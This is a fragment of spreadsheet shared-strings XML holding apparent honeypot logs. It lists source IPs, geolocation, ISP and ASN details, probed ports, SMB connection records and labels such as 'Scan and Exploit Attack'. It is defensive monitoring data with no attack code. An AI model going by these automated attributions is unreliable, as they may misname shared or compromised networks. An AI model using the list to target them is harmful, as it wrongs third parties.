    <t>A1 BG</t>
  </si>
  <si>
    <t>2008-10-10</t>
  </si>
  <si>
    <t>::ffff:3edd:94f0</t>
  </si>
  <si>
    <t>d91acb48ae6b60565874301074e5a517</t>
  </si>
  <si>
    <t>117.212.246.140</t>
  </si>
  <si>
    <t>::ffff:75d4:f68c</t>
  </si>
  <si>
    <t>e272bfe65c1523a3de3e0654b2d56ddd</t>
  </si>
  <si>
    <t>124.153.146.203</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>Scsnet</t>
  </si>
  <si>
    <t>::ffff:7c99:92cb</t>
  </si>
  <si>
    <t>10e533e472e95fabc1a9ed08bb803a58</t>
  </si>
  <si>
    <t>103.218.183.226</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>Lampung</t>
  </si>
  <si>
    <t>Kota Metro</t>
  </si>
  <si>
    <t>Metro</t>
  </si>
  <si>
    <t>1635283</t>
  </si>
  <si>
    <t>-5.11306</t>
  </si>
  <si>
    <t>105.307</t>
  </si>
  <si>
    <t>150266</t>
  </si>
  <si>
    <t>PT Inhqi Media Infotek</t>
  </si>
  <si>
    <t>Inhqi</t>
  </si>
  <si>
    <t>2023-06-12</t>
  </si>
  <si>
    <t>INHQI-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.218.183.226,53790)}&amp;&amp;{Data_SMB:Incoming connection (103.218.183.226,54951)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67da:b7e2</t>
  </si>
  <si>
    <t>45c31080c6e5e3bd11f2a14137ef0324</t>
  </si>
  <si>
    <t>59.92.172.248</t>
  </si>
  <si>
    <t>::ffff:3b5c:acf8</t>
  </si>
  <si>
    <t>1d49c72bdfc94440c8862e899f9b7c8c</t>
  </si>
  <si>
    <t>103.114.146.142</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21244&amp;&amp;1433&amp;&amp;52764&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>Laos</t>
  </si>
  <si>
    <t>Vientiane Prefecture</t>
  </si>
  <si>
    <t>Vientiane</t>
  </si>
  <si>
    <t>1651944</t>
  </si>
  <si>
    <t>17.9726</t>
  </si>
  <si>
    <t>102.599</t>
  </si>
  <si>
    <t>137905</t>
  </si>
  <si>
    <t>Mangkone Technology Co. Ltd.</t>
  </si>
  <si>
    <t>Mangkone Technology Co. Ltd</t>
  </si>
  <si>
    <t>2018-04-27</t>
  </si>
  <si>
    <t>REVO-LA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,49294)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,50277)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,64747)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,65110)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,62705)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,59563)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,59860)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,51878)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,52185)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,56274)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,56573)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,62479)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,62959)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,64658)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,65025)}</t>
  </si>
  <si>
    <t>::ffff:6772:928e</t>
  </si>
  <si>
    <t>fd349a9d17a9d6d6e601761b8d935654</t>
  </si>
  <si>
    <t>115.246.171.172</t>
  </si>
  <si>
    <t>RJIL Internet</t>
  </si>
  <si>
    <t>::ffff:73f6:abac</t>
  </si>
  <si>
    <t>effc3be57faecd920a0d93916dc5c126</t>
  </si>
  <si>
    <t>59.182.118.155</t>
  </si>
  <si>
    <t>::ffff:3bb6:769b</t>
  </si>
  <si>
    <t>9c64c56f7e5854d8c504eac06a183073</t>
  </si>
  <si>
    <t>120.56.13.204</t>
  </si>
  <si>
    <t>::ffff:7838:dcc</t>
  </si>
  <si>
    <t>c543e6df84630ca5461d156f1d637b20</t>
  </si>
  <si>
    <t>117.206.60.230</t>
  </si>
  <si>
    <t>::ffff:75ce:3ce6</t>
  </si>
  <si>
    <t>c3c62ee29e5f241fcb3b5d56531b5b62</t>
  </si>
  <si>
    <t>117.242.197.98</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:75f2:c562</t>
  </si>
  <si>
    <t>eeb9f43c8765f1aac50f824c3986f4b5</t>
  </si>
  <si>
    <t>59.92.160.99</t>
  </si>
  <si>
    <t>::ffff:3b5c:a063</t>
  </si>
  <si>
    <t>d7fe3be52f69d76d37ea8164886d58c1</t>
  </si>
  <si>
    <t>117.219.185.44</t>
  </si>
  <si>
    <t>::ffff:75db:b92c</t>
  </si>
  <si>
    <t>0b2e8a5a750dce7731f513702b7c21c5</t>
  </si>
  <si>
    <t>112.78.37.110</t>
  </si>
  <si>
    <t>YO</t>
  </si>
  <si>
    <t>Yogyakarta</t>
  </si>
  <si>
    <t>Kota Yogyakarta</t>
  </si>
  <si>
    <t>1621177</t>
  </si>
  <si>
    <t>-7.8109</t>
  </si>
  <si>
    <t>110.349</t>
  </si>
  <si>
    <t>55666</t>
  </si>
  <si>
    <t>PT Media Sarana Data</t>
  </si>
  <si>
    <t>Gmedia ID Semarang</t>
  </si>
  <si>
    <t>2009-01-02</t>
  </si>
  <si>
    <t>GMEDIA-ID-SEMARANG</t>
  </si>
  <si>
    <t>::ffff:704e:256e</t>
  </si>
  <si>
    <t>3e276a46f1b9728e989eee06dbbdc216</t>
  </si>
  <si>
    <t>220.132.39.221</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-39-221.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;29387&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:dc84:27dd</t>
  </si>
  <si>
    <t>cb71080ad3b3045067ac18c20c55afcb</t>
  </si>
  <si>
    <t>59.93.137.68</t>
  </si>
  <si>
    <t>::ffff:3b5d:8944</t>
  </si>
  <si>
    <t>7afbf2ef8c7d0f6d5a40045549c193e6</t>
  </si>
  <si>
    <t>120.56.92.155</t>
  </si>
  <si>
    <t>PY</t>
  </si>
  <si>
    <t>Puducherry</t>
  </si>
  <si>
    <t>Karaikal</t>
  </si>
  <si>
    <t>1267887</t>
  </si>
  <si>
    <t>10.9167</t>
  </si>
  <si>
    <t>79.8333</t>
  </si>
  <si>
    <t>::ffff:7838:5c9b</t>
  </si>
  <si>
    <t>762d39ed6d029e4cc53aa134b3738ab8</t>
  </si>
  <si>
    <t>79.16.20.13</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-79-16-20-13.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>Veneto</t>
  </si>
  <si>
    <t>Venice</t>
  </si>
  <si>
    <t>Fornase</t>
  </si>
  <si>
    <t>8948986</t>
  </si>
  <si>
    <t>45.4759</t>
  </si>
  <si>
    <t>12.1627</t>
  </si>
  <si>
    <t>::ffff:4f10:140d</t>
  </si>
  <si>
    <t>887d425687c3b743c6c6ee66aa0b2574</t>
  </si>
  <si>
    <t>103.18.188.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;34829&amp;&amp;445</t>
  </si>
  <si>
    <t>Kabupaten Pemalang</t>
  </si>
  <si>
    <t>Pemalang</t>
  </si>
  <si>
    <t>1631648</t>
  </si>
  <si>
    <t>-6.8935200000000005</t>
  </si>
  <si>
    <t>109.38</t>
  </si>
  <si>
    <t>149974</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kabupaten Pemalang</t>
  </si>
  <si>
    <t>2022-08-10</t>
  </si>
  <si>
    <t>IDNIC-DISKOMINFOKABPEMALANG-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52527)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,63970)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,51708)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52429)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,63506)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64016)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52367)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64682)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64685)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64696)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,53458)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,53900)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6712:bc09</t>
  </si>
  <si>
    <t>e7fb4c3f8b3320ab1c987dd3bb527e96</t>
  </si>
  <si>
    <t>80.69.61.40</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;445&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>Baku</t>
  </si>
  <si>
    <t>40.4093</t>
  </si>
  <si>
    <t>49.8671</t>
  </si>
  <si>
    <t>8814</t>
  </si>
  <si>
    <t>Aztelekom LLC</t>
  </si>
  <si>
    <t>Aztelekom</t>
  </si>
  <si>
    <t>2004-11-11</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50460)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,31279)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,51216)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49324)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,60050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55102)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55456)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,65316)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55152)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55795)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,61671)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53149)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53454)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49168)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49177)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,62366)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,62374)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,59807)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,59813)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53711)}</t>
  </si>
  <si>
    <t>::ffff:5045:3d28</t>
  </si>
  <si>
    <t>16a9fe2ffbf79ff5363be5320aa9ad39</t>
  </si>
  <si>
    <t>202.46.27.37</t>
  </si>
  <si>
    <t>Kota Surabaya</t>
  </si>
  <si>
    <t>Gubengairlangga</t>
  </si>
  <si>
    <t>1985528</t>
  </si>
  <si>
    <t>-7.28145</t>
  </si>
  <si>
    <t>112.744</t>
  </si>
  <si>
    <t>63491</t>
  </si>
  <si>
    <t>IDNIC-WIMA-AS-ID</t>
  </si>
  <si>
    <t>Universitas Katolik Widya Mandala</t>
  </si>
  <si>
    <t>::ffff:ca2e:1b25</t>
  </si>
  <si>
    <t>d0d6755c443ef6b4e3eba4c442062115</t>
  </si>
  <si>
    <t>117.192.179.73</t>
  </si>
  <si>
    <t>::ffff:75c0:b349</t>
  </si>
  <si>
    <t>3d57fb709bcff7c590d8d9c9312b28aa</t>
  </si>
  <si>
    <t>117.203.14.217</t>
  </si>
  <si>
    <t>::ffff:75cb:ed9</t>
  </si>
  <si>
    <t>2f6ff9f8068c45d46506b917c53e20f7</t>
  </si>
  <si>
    <t>59.180.176.171</t>
  </si>
  <si>
    <t>::ffff:3bb4:b0ab</t>
  </si>
  <si>
    <t>0d40d73db83ee486a22baad0eeeda810</t>
  </si>
  <si>
    <t>117.202.144.178</t>
  </si>
  <si>
    <t>::ffff:75ca:90b2</t>
  </si>
  <si>
    <t>28a0e63f1806d987552ef5055b9521cf</t>
  </si>
  <si>
    <t>14.191.98.119</t>
  </si>
  <si>
    <t>49</t>
  </si>
  <si>
    <t>Vĩnh Long Province</t>
  </si>
  <si>
    <t>Trà Ôn District</t>
  </si>
  <si>
    <t>Trà Ôn</t>
  </si>
  <si>
    <t>1563977</t>
  </si>
  <si>
    <t>9.96261</t>
  </si>
  <si>
    <t>105.922</t>
  </si>
  <si>
    <t>::ffff:ebf:6277</t>
  </si>
  <si>
    <t>b51b5747d8034aef6586f47a3199cadd</t>
  </si>
  <si>
    <t>117.233.142.59</t>
  </si>
  <si>
    <t>::ffff:75e9:8e3b</t>
  </si>
  <si>
    <t>a9f5f9a0a28c98b282ac7625d8a2f61b</t>
  </si>
  <si>
    <t>117.6.127.21</t>
  </si>
  <si>
    <t>::ffff:7506:7f15</t>
  </si>
  <si>
    <t>f5cf66c245c5415a97ae0c609958034e</t>
  </si>
  <si>
    <t>117.200.187.6</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>36454&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75c8:bb06</t>
  </si>
  <si>
    <t>626dcafd3b087337e23d6348a0f5ceed</t>
  </si>
  <si>
    <t>88.84.251.46</t>
  </si>
  <si>
    <t>T</t>
  </si>
  <si>
    <t>Örebro</t>
  </si>
  <si>
    <t>Örebro Municipality</t>
  </si>
  <si>
    <t>2686657</t>
  </si>
  <si>
    <t>700 02</t>
  </si>
  <si>
    <t>59.2753</t>
  </si>
  <si>
    <t>15.2134</t>
  </si>
  <si>
    <t>1257</t>
  </si>
  <si>
    <t>Tele2 Sverige AB</t>
  </si>
  <si>
    <t>Karlskoga stadsnat</t>
  </si>
  <si>
    <t>2006-01-24</t>
  </si>
  <si>
    <t>::ffff:5854:fb2e</t>
  </si>
  <si>
    <t>634a230df736f6abf241e8fc8fca3b43</t>
  </si>
  <si>
    <t>59.178.187.81</t>
  </si>
  <si>
    <t>Bhiwani</t>
  </si>
  <si>
    <t>Lohāru</t>
  </si>
  <si>
    <t>1264829</t>
  </si>
  <si>
    <t>28.4299</t>
  </si>
  <si>
    <t>75.8078</t>
  </si>
  <si>
    <t>::ffff:3bb2:bb51</t>
  </si>
  <si>
    <t>a3b0be9426d750787373b5055c65384d</t>
  </si>
  <si>
    <t>117.222.101.42</t>
  </si>
  <si>
    <t>::ffff:75de:652a</t>
  </si>
  <si>
    <t>847e1f5f967872cbe0ae8cea24cb5375</t>
  </si>
  <si>
    <t>114.33.115.150</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-115-150.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>2008-04-18</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:7396</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various services on the network, likely for reconnaissance and potential further attacks. They are probing different ports and protocols, trying to identify vulnerabilities and gain unauthorized access.</t>
  </si>
  <si>
    <t>Scan and Exploit Attack</t>
  </si>
  <si>
    <t>1798b51fb21132568f5abc056b1d977e</t>
  </si>
  <si>
    <t>2.86.249.214</t>
  </si>
  <si>
    <t>NA&amp;&amp;ppp-2-86-249-214.home.otenet.gr</t>
  </si>
  <si>
    <t>GR</t>
  </si>
  <si>
    <t>Greece</t>
  </si>
  <si>
    <t>I</t>
  </si>
  <si>
    <t>Attica</t>
  </si>
  <si>
    <t>Nomarchía Athínas</t>
  </si>
  <si>
    <t>Athens</t>
  </si>
  <si>
    <t>264371</t>
  </si>
  <si>
    <t>37.9838</t>
  </si>
  <si>
    <t>23.7278</t>
  </si>
  <si>
    <t>6799</t>
  </si>
  <si>
    <t>Ote SA (Hellenic Telecommunications Organisation)</t>
  </si>
  <si>
    <t>OTEnet</t>
  </si>
  <si>
    <t>Ote SA</t>
  </si>
  <si>
    <t>::ffff:256:f9d6</t>
  </si>
  <si>
    <t>d4eddfa50326623312bbf8772fd34eae</t>
  </si>
  <si>
    <t>117.214.103.106</t>
  </si>
  <si>
    <t>::ffff:75d6:676a</t>
  </si>
  <si>
    <t>fc05962e53329b560ff54127c81f431a</t>
  </si>
  <si>
    <t>117.206.190.2</t>
  </si>
  <si>
    <t>::ffff:75ce:be02</t>
  </si>
  <si>
    <t>c8e3da593620aef06ddd86e2592454f6</t>
  </si>
  <si>
    <t>117.216.20.223</t>
  </si>
  <si>
    <t>::ffff:75d8:14df</t>
  </si>
  <si>
    <t>606be4fbfd77229ecd2724e7b17245ad</t>
  </si>
  <si>
    <t>117.214.79.41</t>
  </si>
  <si>
    <t>::ffff:75d6:4f29</t>
  </si>
  <si>
    <t>34979edea7ed2862cccbd8e7020c3c46</t>
  </si>
  <si>
    <t>117.207.254.5</t>
  </si>
  <si>
    <t>::ffff:75cf:fe05</t>
  </si>
  <si>
    <t>04b2e34dfc68372b321fd8a4b84a85a4</t>
  </si>
  <si>
    <t>1.231.222.22</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;389&amp;&amp;28409&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:1e7:de16</t>
  </si>
  <si>
    <t>db44df6f47f1ab5727333301c44c07a0</t>
  </si>
  <si>
    <t>5.202.101.153</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;30204</t>
  </si>
  <si>
    <t>35.7355</t>
  </si>
  <si>
    <t>51.4023</t>
  </si>
  <si>
    <t>49100</t>
  </si>
  <si>
    <t>Pishgaman Toseeh Ertebatat Company (Private Joint Stock)</t>
  </si>
  <si>
    <t>2012-08-29</t>
  </si>
  <si>
    <t>::ffff:5ca:6599</t>
  </si>
  <si>
    <t>05a7b77b09f1156e405bac51c1c1cf6b</t>
  </si>
  <si>
    <t>59.183.27.35</t>
  </si>
  <si>
    <t>::ffff:3bb7:1b23</t>
  </si>
  <si>
    <t>965431ac99d75ac21c0403b11df59c05</t>
  </si>
  <si>
    <t>103.111.110.185</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>25060&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Gondal (Radhakrishna Nagar)</t>
  </si>
  <si>
    <t>1270994</t>
  </si>
  <si>
    <t>360311</t>
  </si>
  <si>
    <t>21.9615</t>
  </si>
  <si>
    <t>70.7985</t>
  </si>
  <si>
    <t>137118</t>
  </si>
  <si>
    <t>Sparklink.Net Pvt Ltd</t>
  </si>
  <si>
    <t>Sparklink Net Pvt Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,61835)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,63343)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,53521)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,58039)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,61133)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,54812)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,60996)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,56265)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,56819)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,57222)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,64648)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,49587)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:676f:6eb9</t>
  </si>
  <si>
    <t>Port Scanner</t>
  </si>
  <si>
    <t>0e3e30e03914e2b37cfd96f304c15d8c</t>
  </si>
  <si>
    <t>178.242.24.81</t>
  </si>
  <si>
    <t>Trabzon</t>
  </si>
  <si>
    <t>Ortahisar</t>
  </si>
  <si>
    <t>738648</t>
  </si>
  <si>
    <t>41.0027</t>
  </si>
  <si>
    <t>39.7168</t>
  </si>
  <si>
    <t>::ffff:b2f2:1851</t>
  </si>
  <si>
    <t>40f03b46d1b29d9e986009937567bebe</t>
  </si>
  <si>
    <t>113.166.120.106</t>
  </si>
  <si>
    <t>Bà Rịa–Vũng Tàu Province</t>
  </si>
  <si>
    <t>Thành Phố Vũng Tàu</t>
  </si>
  <si>
    <t>Vũng Tàu</t>
  </si>
  <si>
    <t>1562414</t>
  </si>
  <si>
    <t>10.346</t>
  </si>
  <si>
    <t>107.084</t>
  </si>
  <si>
    <t>::ffff:71a6:786a</t>
  </si>
  <si>
    <t>75f89b76f4ea017f8fddb28d42f184d9</t>
  </si>
  <si>
    <t>212.156.95.198</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H26</t>
  </si>
  <si>
    <t>8443&amp;&amp;443</t>
  </si>
  <si>
    <t>40.9111</t>
  </si>
  <si>
    <t>29.3137</t>
  </si>
  <si>
    <t>9121</t>
  </si>
  <si>
    <t>Turk Telekomunikasyon Anonim Sirketi</t>
  </si>
  <si>
    <t>TurkTelekom</t>
